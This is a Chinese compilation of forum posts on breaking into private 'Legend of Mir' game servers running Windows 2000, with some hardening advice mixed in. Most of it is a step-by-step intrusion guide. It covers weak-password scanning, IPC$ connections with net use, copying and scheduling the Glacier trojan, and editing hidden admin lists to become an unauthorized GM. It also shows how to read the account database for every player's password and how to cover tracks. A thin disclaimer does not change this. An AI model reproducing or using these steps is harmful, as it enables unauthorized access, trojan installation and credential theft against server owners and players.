下面我先寫如何入侵計(jì)算機(jī)的，我用的是WINDOWS 2000 SEVER

　　1 X-SCAN掃描IP 看看誰是弱口令（IP也非常容易得到，都有，弱口令就是用戶名和密碼都是系統(tǒng)默認(rèn)的，沒有改。）

　　2 打開DOS系統(tǒng) 在DOS下進(jìn)行*作！

　　c:/>net use \\192.168.0.1\ipc$ /user:administrator 進(jìn)入對方計(jì)算機(jī)USER進(jìn)入的就是管理員用戶。

　　進(jìn)入了以后就好辦了，可以找你要黑的！做GM也好，搞破壞刪除也好，比如做GM吧！

　　c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令，可以看出來，其余的想怎么改就憑你了，但是我得解釋一下??！這段代碼目的很簡單就是將D盤拷貝一個傳奇GM的列表，你可以把你自己添加進(jìn)去在編輯！

　　c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt

　　這樣就可以了。這是利用弱口令進(jìn)入計(jì)算機(jī)的方法?。‘?dāng)然了還有更多的方法。

　　我在講講我的 ** 傳奇的遭黑的經(jīng)歷！

　　首先，就是鼠標(biāo)亂動，很明顯就是被人控制了，分析如下：1，中木馬，2遠(yuǎn)程控制！

　　其次，有文件覆蓋的對話框，計(jì)算機(jī)被突然重新啟動??！分析如下：1，破壞系統(tǒng)，2，對傳奇的控制！3，從新啟動是為了黑客的設(shè)置生效！

　　再次，有非法GM制造物品，以被查出。分析如下：是針對傳奇而來！

　　解決辦法：用殺毒軟件殺毒，最好在DOS下進(jìn)行！2，是2000的漏洞太多，查找無用的端口，并關(guān)閉3389等，下載 2000 SP3 的補(bǔ)??！在控制面板中選本地用戶和組中關(guān)閉GUEST帳號！和 IUSR （計(jì)算機(jī)名）INTNERNET來賓帳號關(guān)閉（我的傳奇就是黑客利用這個號進(jìn)入計(jì)算機(jī)的），修改超級管理員用戶名與密碼！ 在關(guān)閉遠(yuǎn)程訪問等功能，另外，進(jìn)攻傳奇主要是GM列表，我同樣也中過，現(xiàn)象是這樣的，打開AdminList.txt文件，沒有發(fā)現(xiàn)多的GM，利用CTRL-A看看有沒有多余的GM，另外仔細(xì)一看，在看AdminList.TXT的文件名后面有沒有空格，設(shè)置文件全部顯示，會發(fā)現(xiàn)是否多了一個隱藏GM列表文件，這也是屢進(jìn)不止的發(fā)現(xiàn)有非法GM的原因.黑客進(jìn)攻我的計(jì)算機(jī)是用了2個小時就被我發(fā)現(xiàn)了，立即做了相應(yīng)的修改，恢復(fù)了傳奇的正常運(yùn)行，至今為止，仍然有人進(jìn)入我的來賓帳號的警告，但是已經(jīng)進(jìn)不來了！傳奇也步入了正常的運(yùn)行當(dāng)中！

face=Verdana>　　雖然我寫了一些如何進(jìn)攻和防御計(jì)算機(jī)的方法和解決辦法，我自己也覺得有點(diǎn)自相矛盾的想法，但是我的目的很是簡單，希望能夠幫助你解決你的問題！提高自己計(jì)算機(jī)的安全

　　如何在別人的做GM?

　　攻擊初級教學(xué)

　　我在侵入別人4f所使用的方法

　　看到有些4f做的不錯，但是進(jìn)去又不是很有錢，也沒裝備，高手也很多，一直不喜歡在里面當(dāng)菜鳥的我，一口氣進(jìn)入他們的服務(wù)器端大鬧一番之后。當(dāng)足了gm的癮，現(xiàn)在我把方法公布與大家。。。。
　
　　其實(shí)我所使用的方法很簡單，只有４個工具：
　
　?。ㄒ唬簊hed.exe

　?。ǘ┝鞴?000

　?。ㄈヽmd.exe (其實(shí)就是２０００下的dos啦)！
　
　?。ㄋ模┍?.4 操作系統(tǒng)：win2000 server 或者winxp系統(tǒng)。 “shed.exe”:其實(shí)就是用來網(wǎng)上查共享資源的，速度快，可以查到很多服務(wù)斷的共項(xiàng)文件，不過在這里面有些ｉｐ在瀏覽器中無法訪問，這是因?yàn)槠渲幸舶藗€人上網(wǎng)的ｉｐ．呵呵！一些作網(wǎng)站，網(wǎng)吧的服務(wù)器一些目錄都是共享的，有些是可以訪問，但是不能刪除，因?yàn)槟闼L問的都是以匿名訪問的，所以權(quán)限不夠！有些需要密碼。遇到密碼怎辦？用流光！ “流光”雖說對202作了限制，但是對ip可是沒有限制的，呵呵！所以說使用流光的ipc探測，建立一個空對話，查到用戶列表，然后先簡單探測，此時有些網(wǎng)管懶惰，把a(bǔ)dministrator設(shè)置的過于簡單，呵呵，你就可以抓到了。
　
　　下一步如何做呢？也許在你查對方的端口時發(fā)現(xiàn)對方開的端口很少，比如ftp沒開，怎辦呢？冰河！ “冰河”，想必許多朋友都玩過，使用冰河控制一臺服務(wù)器速度很快，（因?yàn)榉?wù)器那邊帶寬很大）幾分鐘就可以查到對方主機(jī)的主頁所在位置。但是如何上傳并且控制他呢？ “cmd.exe” 是２０００下的ｄｏｓ了，執(zhí)行cmd.exe 使用net命令，

　　具體操作如下： 　
　　第一步：net use \\ip\ipc$　“password” /user:”user” 說明：以一個超級用戶名與你想黑的網(wǎng)站建立聯(lián)接，當(dāng)然超級用戶必須是該網(wǎng)站admin里的。這里的”ip”就是主機(jī)了，“password”就是超級用戶的密碼，“user”就是超級用戶。比如：net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie

　　第二步：copy g-server.exe \\ip\admin$\system32 說明：g-server.exe就是冰河的遠(yuǎn)程服務(wù)器端。意義：將此文件拷貝到對方的主機(jī)winnt里的system32目錄里。也許有人要問木馬侵入對方那邊可以察覺出來的吧，呵呵！裝了防火墻估計(jì)可以，不過很多主機(jī)沒錢買呀！不像中國盜版滿天飛！如果你有最新的木馬也可以的！這是最好的了！！嘿嘿……

　　第三步：net time \\ip 察看對方的服務(wù)器時間。由于有時差，應(yīng)該是一個小時吧！所以必須要以對方的服務(wù)器時間為準(zhǔn)。

　　第四步：at \\ip time g-server.exe 這里的time就是對方的主機(jī)時間。作用：在規(guī)定時間執(zhí)行該程序。比如　at \\210.248.250.2 19:55 g-server.exe 第五步：冰河就可以控制該電腦了。這個我就不說了吧，呵呵！菜鳥也會玩的軟件。

　　這時我們就可以控制服務(wù)器了，

　　net use * \\ip\*$ 遠(yuǎn)程映射

　　看這個

　　mir.db里面有每個人的數(shù)據(jù)，并且沒加密的，大家可以用

　　access找開來改一下，改幾個極品，如0-80攻的木劍啊，0-50魔的六角戒指之類的，那就隨你的便了。只是這樣也太煩人了。呵呵。

　　比如武器，數(shù)據(jù)格式如下（全部是16進(jìn)制）

　　** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a

　　前面**的是物品代碼，然后0xce 00 是武器代碼(高位在后)，和物品db數(shù)據(jù)庫中對應(yīng)，

　　例：物品數(shù)據(jù)庫中屠龍是序號（idx）是205，對應(yīng)到這里就是（205+1）轉(zhuǎn)為16進(jìn)制是ce

　　后面的 43 12是當(dāng)前持久度，88 13是最大持久度。

　　例：43 12換算成十進(jìn)制為17170，持久度為17

　　后面的01 02 03依次是攻擊、魔法、道術(shù)。

　　注意是在原武基礎(chǔ)上增加。

　　例：上面的屠龍顯示出來是攻擊：5-36，道術(shù)：0-2，魔法：0-3。

　　后面的04 05 06 07 08 09依次是武器的 幸運(yùn)、詛咒、準(zhǔn)確、攻擊速度、強(qiáng)度。

　　后面兩個空位后緊跟的0x0a是表示武器是否被修煉，具體來說

　　給武器加攻擊時：

　　修煉前：00

　　修煉后：0a

　　試驗(yàn)成功后：00，攻擊值增加。

　　對于首飾和衣服，自己研究吧，這有好多人都知道的吧，我沒細(xì)寫。網(wǎng)上這方面的文章是有的，我就不用多說了吧？

　　然后到，　mirserver\mud2\logsrv\iddb下

　　這里有個id.db所有人的帳號和密碼都在了，你看著辦吧，不過偷人家的號也不是什么光榮的事，我是從來不做的，只是常常會拿gm的號來reload一下。呵呵

　　這里，我把你邊走邊看加到這個服務(wù)器的adminlist，呵呵，這里是打個比方，這里加入你的名字），然后，我們到mir.db中找出gm的帳號，再到id.db中找出這個帳號的密碼。好了，ok了，用gm號進(jìn)入游戲（進(jìn)之前m一下他啊，不要讓人家發(fā)現(xiàn)了，也不要改人家的密碼，讓人家發(fā)現(xiàn)了多不好啊，呵呵）。打命令@reloadadmin。立刻out吧。

　　然后，把你加入adminlist的人物從adminlist里刪除，好了，你進(jìn)去游戲吧，你是gm了，可是真正的gm是不會從服務(wù)器端看到你的名字呢?。∷苍S在想“這里怎么了??？好像還有個gm？？？”。呵呵，不過不要過火了，不然人家一個reload你的權(quán)限就沒了啊。

　　到這里大家做gm的夢就完成了，下面我說的就是怎么遠(yuǎn)程控制服務(wù)器主機(jī)了，比如給他關(guān)機(jī)啊重啟啊····

技術(shù)我是一點(diǎn)都不懂。不過服務(wù)器安全方面還是略懂一二哦！

　　服務(wù)器入侵主要靠的是帳號與密碼。大家要先明白什么是系統(tǒng)帳號。什么是系統(tǒng)密碼！

　　其它WINDOWS每一個系統(tǒng)都有著他的超級管理員帳號與密碼！

　　一但這些被黑客掃描到的話，哪么你將會得到一個恐怕的威脅！

　　一：了解一下帳號的含義

　　先運(yùn)行CMD

　　然后輸入：net user（回車?。?/p>

　　這樣后，會顯示一例帳號

　　再查看管理員帳號

　　輸入：net localgroup administrators

　　這就是查看administrators組的用戶。這樣的話若是人家用隱藏帳號的方法也會查出來！

　　系統(tǒng)自帶的超級管理員帳號是administrator

　　記住這里顯示出來多個帳號不明的帳號。哪就證明你機(jī)器不安全了。若出現(xiàn)在的帳號都是你自已的帳號。哪百分之四十你機(jī)器未被入侵

　　帳號安全：

　　二：密碼篇

　　你若覺得自已的帳號密碼是123456哪么不出三秒人家就到你機(jī)上一游了。

　　修改密碼方法，在DOS下修改更安全

　　輸入net user 帳號名 需修改密碼（然后回車?。?/p>

　　一般密碼設(shè)復(fù)雜一點(diǎn)！ 　

　　溢出：

　　2000服務(wù)器版裝下去會自動裝IIS的，若你覺得IIS沒有什么用就停止。IIS地址：開始》》程序》》管理工具》》Internet信息服務(wù)（這個就是IIS）你將他開啟。上面按停止！這樣就進(jìn)一步安全了。不過若IIS你需要用的話，哪么記得打目前最新的補(bǔ)丁SP4哦。

　　RPC溢出。大家記住，試試telnet IP 135看看有沒有開著。若是開著。請打RPC補(bǔ)丁。若找不到。干脆裝個防火墻，將135端屏蔽！
　
　　大家千萬要記住。入侵系統(tǒng)最關(guān)點(diǎn)的就是要帳號密碼。保護(hù)好自已帳號與密碼。安全一定屬于你！

　　入侵傳奇/充當(dāng)非法GM

　　首先，我得聲明，我寫本文并不是教大家如何去黑4f，只是想以本文引起廣大4f擁有者的注意，提高自己的網(wǎng)管水平。

　　我愛玩游戲，但卻玩得很菜，也沒有時間去玩，只想玩著過癮，所以，當(dāng)我開始玩?zhèn)髌鏁r，雖覺得是好玩，但玩盛大的簡直是在受罪，升級慢，沒好裝備，處處受人欺負(fù)。所以，4f是明智的選擇，但進(jìn)去時也沒有好裝備，也是受人欺負(fù)，難道我不可以做gm？試試，folling me！

　　找來一大堆4f的ip，開個x-scan掃吧。有了，還真不少，都是弱口令的，這些網(wǎng)管真菜呀。

　　選好一個，192.168.0.1，go！

　　打開cmd，

　　1）c:/>net use 192.168.0.1ipc$ /user:administrator

　　連接成功，

　　ok，連上了，成功在望，

　　2）c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt

　　系統(tǒng)找不到指定的文件。

　　沒有？不可能吧？唔，一定是隱藏了，沒關(guān)系，再來，

　　3）c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt

　　沒有提示，成功了，

　　這次連復(fù)制也不用了，直接改吧，

　　4）c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt

　　會打開個介面，看看里面有哪些gm，加個吧，自己記得就行了，改完保存退出

　　5）c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt

　　把a(bǔ)dminilist.txt還原成只讀隱藏，

　　好了，大功告成，快打掃腳印吧，別讓人發(fā)現(xiàn)被入侵了，

　　現(xiàn)在，就等著系統(tǒng)重啟了，等不及的話就在第五步讓它重啟，不過這樣太危險了，還是等吧，

　　第二天注冊個帳號，新建個之前加的人名進(jìn)去，

　　/who

　　當(dāng)前150人在線

　　哈，我就是gm了。趕快把自己升級，

　　@level -1

　　升級成功，255級，哈哈

　　再造出想要的裝備，想要什么盡情造吧，

　　重復(fù)上面的把自己從adminlist.txt里刪了，哈哈，好裝備到手了，可以玩了

　　面記得有位朋友對加強(qiáng)對服務(wù)器安全性的解決方法進(jìn)行了一系列的說明，講得非常詳細(xì)，但是我覺得還有很多需要補(bǔ)充的地方.微軟的系統(tǒng)是漏洞和補(bǔ)丁著稱，真正要對服務(wù)器的安全配置確實(shí)非常困難，考慮的方面也太多了.

　　今天先講一個方面的內(nèi)容了，也算是對前面的朋友的進(jìn)一步補(bǔ)充吧！

　　前面那位朋友所概述的主要是針對WIN2000系統(tǒng)弱口令的安全設(shè)置！他已經(jīng)說得很仔細(xì)了，做到那些，口令這一關(guān)差不多了.確實(shí)在互聯(lián)網(wǎng)的時代，口令真的非常重要.我對國外的主機(jī)進(jìn)行了一系列的測試，就拿有弱口令的系統(tǒng)來說，還有不少！其中也包括了不少中小型企業(yè)的WEB服務(wù)器，E-MAIL，PROXY服務(wù)器都有這種低級的錯誤！

　　如果說你在這方面做得非常的仔細(xì).但你至少還要仔細(xì)研究一下你主機(jī)現(xiàn)在所運(yùn)行的有哪些服務(wù)，這些服務(wù)代表著什么?你應(yīng)該很清楚！因?yàn)楝F(xiàn)在黑客軟件，木馬工具，遠(yuǎn)程控制軟件大多是以一種服務(wù)的形式運(yùn)行在你的服務(wù)器系統(tǒng)里，一般的防火墻，殺毒軟件對其并沒有任何反映的.對于服務(wù)形式出現(xiàn)的控制工具.比較難得發(fā)現(xiàn)，所以你就必須在服務(wù)器里運(yùn)行的哪些服務(wù)非常熟悉.對于陌生或奇怪的服務(wù)應(yīng)該安全設(shè)置好.

　　下面我都WIN2000的WWW(IIS)服務(wù)器安全配置略講一下，WWW服務(wù)在WIN2000SERVER，ADSERVER，DATACENTERSERVER，版本中是默認(rèn)安裝的，如果你不需要用2000的WWW服務(wù)的話，建議不要安裝.至于添加/刪除你可以控制面板的去掉他的安裝，或者在管理工具/服務(wù)里設(shè)置WORD WIDE WEB SERVICE啟動類型為手動/禁用

　　這樣的話系統(tǒng)就不默認(rèn)啟動改服務(wù)！

　　如果你需要用IIS來建站宣傳一下自己的，你就必須按以下方法安全配置好IIS，

　　在IIS組件你首先要去掉你不需要的SMTP，SNNP，F(xiàn)TP，這樣的話你可以降低你服務(wù)器運(yùn)行所占用的CPU資源，和內(nèi)存使用率.然后建議你刪除你C:\INTERPUB\目錄下的所有內(nèi)容！或者更改路徑.在IIS管理器中刪除默認(rèn)站點(diǎn)，(或者刪除SCRIPTS這個虛擬目錄)因?yàn)檫@個目錄有可寫的權(quán)限的.在新建的WEB站點(diǎn)中，設(shè)置IIS的權(quán)置，必須讓它不能寫入，或運(yùn)行.因?yàn)镮IS是默認(rèn)支持ASP腳本的.然后在IIS中刪除不需要的映射，這個很重要.如果你要支持PHP，CGI腳本的話，你還得配置好PHP.CGI的應(yīng)用程序的正確映射，禁用或刪除FSO組件，(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的話，最好要改名！否則的話，你給別人提供主頁上傳的話，你肯定是會被黑的。小心呀！

　　這些來說應(yīng)該是服務(wù)器安全防范方面的一個例子而已，真正要做到服務(wù)器的安全運(yùn)行，需要你花大量的時間去摸索.因?yàn)檫@些來說，足以應(yīng)付一些無聊的.....當(dāng)然了，你如果需要WEB服務(wù)器，我還是建議你去使用AP了.他的源代碼開發(fā)，免費(fèi)，安全性穩(wěn)定性都比IIS強(qiáng)得多了.

最新評論